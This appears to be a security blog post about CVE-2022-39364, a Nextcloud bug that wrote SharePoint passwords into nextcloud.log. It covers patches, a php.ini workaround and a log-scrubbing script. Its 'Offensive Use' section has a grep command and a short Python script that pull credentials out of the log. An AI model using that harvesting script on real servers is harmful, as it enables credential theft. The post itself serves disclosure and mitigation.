Nextcloud Server is a powerful open-source, self-hosted platform trusted by many for file sharing, productivity, and collaboration. But like all software, it's not immune to vulnerabilities. In 2022, a critical bug—tracked as CVE-2022-39364—was discovered that could allow attackers to capture sensitive SharePoint credentials from a simple server log file.
In this long-read post, we'll explain what CVE-2022-39364 is, show how an attacker could exploit it, and offer easy, practical mitigation tips—including official patches and a quick PHP configuration change. We’ll keep the language simple, make everything clear, and add unique insights you won't find in the official advisories.
What Is Nextcloud Server?
If you're new to Nextcloud: it's the engine behind many private cloud solutions. Businesses and privacy-focused users run it on their own servers so they can store, sync, and share files away from commercial cloud vendors. Nextcloud connects to many services, including Microsoft SharePoint, to pull files all into one place.
What Happened?
When you connect a SharePoint resource to Nextcloud, the Nextcloud Server logs connection attempts in a file called nextcloud.log. These log entries help with debugging—but by accident, they include credentials like usernames and passwords in clear text, not redacted.
Anyone who can read nextcloud.log (on the server or via a backup) can steal those credentials, then use them to access your SharePoint services. Not good.
Simply put: If you can read the log, you can steal the keys.
What Makes This Dangerous?
- Logs stick around: Attackers who compromise your server later can still find leftovers from old log entries.
- Logs may be copied: Insecure backups or admins with too many privileges can see the plain-text credentials.
- Password reuse: Many users reuse credentials across services. One exposed password could open several doors.
Step 1: Get Log File Access
An attacker who gains local access (maybe another user with SSH, a misconfigured backup script, or a web shell) looks for the Nextcloud log file, often at:
```
/var/www/nextcloud/data/nextcloud.log
```
Or, if you use a custom data directory:
```
/path/to/nextcloud/data/nextcloud.log
```
Step 2: Search for SharePoint Credentials
The attacker searches for lines indicating SharePoint activity. A simple grep command does the trick:
```
grep 'sharepoint' /var/www/nextcloud/data/nextcloud.log
```
Let’s say the log included something like this:
```
{
  "reqId":"abcdef12345",
  "level":3,
  "time":"2022-10-01T09:12:34+00:00",
  "remoteAddr":"192.168.1.33",
  "app":"files_external",
  "message":"Exception thrown while creating mount with arguments: \"https://mysharepointsite\", \"myuser\", \"SuperSecretPassword\""
}
```
Notice: The password SuperSecretPassword is right there!
Step 3: Offensive Use
The attacker can now log directly into your organization's SharePoint or test these credentials on other services if you reuse passwords.
Here’s a tiny Python script that finds SharePoint credentials in the log:
```python
import re

# Read the log line by line and keep only lines that mention SharePoint
with open('/var/www/nextcloud/data/nextcloud.log') as log:
    for line in log:
        if 'sharepoint' in line:
            # Capture the "<url>", "<user>", "<password>" argument list
            creds = re.findall(r'"(https?://[^"]+)", "([^"]+)", "([^"]+)"', line)
            for url, user, pwd in creds:
                print(f"Found SharePoint credentials: {user}@{url} with password: {pwd}")
```
What it does:
Looks for SharePoint log entries, grabs URL, username, and password, and prints them. Simple and effective.
How Did This Happen?
This bug happened because exception handling code in Nextcloud didn’t ignore the argument values when writing errors to the log. So, everything passed in—including things like passwords—got dumped into the log for troubleshooting.
Official Patch
If you’re running affected versions, upgrade immediately.
Update to at least 22.2.10.5, 23.0.9, or 24.0.5.
> Official advisory:
> Nextcloud Security Advisory: NC-SA-2022-011
> GitHub CVE reference
Quick Workaround (if You Can’t Patch Immediately)
You can tell PHP to hide function arguments (like passwords) from exception traces, making logs safer.
Add this line to your php.ini:
```
zend.exception_ignore_args = On
```
This sanitizes exception traces and keeps passwords out of logs.
Reference:
Zend PHP Documentation
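The php.ini setting only affects exceptions logged from then on; entries already in nextcloud.log (and in backups of it) keep whatever was written. As an added example (not from the original post or the Nextcloud project), this Python script scans log lines for the argument pattern shown in the sample entry above, masks the password, and reports which accounts need their credentials rotated. The pattern, the `redact` and `scrub_log` names and the sample lines are assumptions built from that sample entry; real entries may be shaped differently.

```python
import json
import re

# Assumed pattern, taken from the sample entry: "<url>", "<user>", "<password>"
CRED_ARGS = re.compile(r'"(https?://[^"]+)",\s*"([^"]*)",\s*"([^"]*)"')

def redact(node, found):
    """Mask the password in every string of a decoded log entry."""
    if isinstance(node, str):
        def mask(m):
            found.append({"url": m.group(1), "user": m.group(2)})  # never the password
            return f'"{m.group(1)}", "{m.group(2)}", "***REDACTED***"'
        return CRED_ARGS.sub(mask, node)
    if isinstance(node, list):
        return [redact(x, found) for x in node]
    if isinstance(node, dict):
        return {k: redact(v, found) for k, v in node.items()}
    return node

def scrub_log(lines):
    """Return (cleaned_lines, report) for an iterable of nextcloud.log lines."""
    cleaned, report = [], []
    for raw in lines:
        raw = raw.rstrip("\n")
        try:
            entry = json.loads(raw)
        except json.JSONDecodeError:
            entry = None                     # non-JSON lines pass through untouched
        found = []
        safe = redact(entry, found) if isinstance(entry, dict) else None
        if not found:
            cleaned.append(raw)              # unchanged entries keep their exact text
            continue
        cleaned.append(json.dumps(safe, separators=(",", ":")))
        report += [{"reqId": entry.get("reqId"), "time": entry.get("time"), **f} for f in found]
    return cleaned, report

# Constructed sample lines modelled on the entry shown in this post (not real log data).
SAMPLE = [
    '{"reqId":"abcdef12345","level":3,"time":"2022-10-01T09:12:34+00:00",'
    '"remoteAddr":"192.168.1.33","app":"files_external","message":"Exception thrown while '
    'creating mount with arguments: \\"https://mysharepointsite\\", \\"myuser\\", \\"SuperSecretPassword\\""}',
    '{"reqId":"zzz999","level":1,"time":"2022-10-01T09:13:00+00:00","app":"core","message":"Login ok"}',
    "not json at all",
]

if __name__ == "__main__":
    for r in scrub_log(SAMPLE)[1]:
        print(f"rotate: {r['user']} at {r['url']} (reqId {r['reqId']}, {r['time']})")
```

Run it against a copy of the log and of any rotated or backed-up logs, and treat every reported account as exposed until its password has been changed.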
- Don’t assume logs are safe—sensitive data can leak almost anywhere.
- Regular updates and quick patching are critical, especially for internet-facing systems like Nextcloud.
Final Thoughts
A single overlooked log entry can undo all your careful security plans. CVE-2022-39364 is a reminder to review your software’s logging setup and keep up with patches. Nextcloud fixed this bug fast—make sure you update and tweak your PHP settings if you can’t patch right away.
For more info:
- Nextcloud Security Advisory: GHSA-r6p6-g742-654m
- NVD CVE Detail: CVE-2022-39364
Timeline
Published on: 10/27/2022 15:15:00 UTC
Last modified on: 10/31/2022 14:26:00 UTC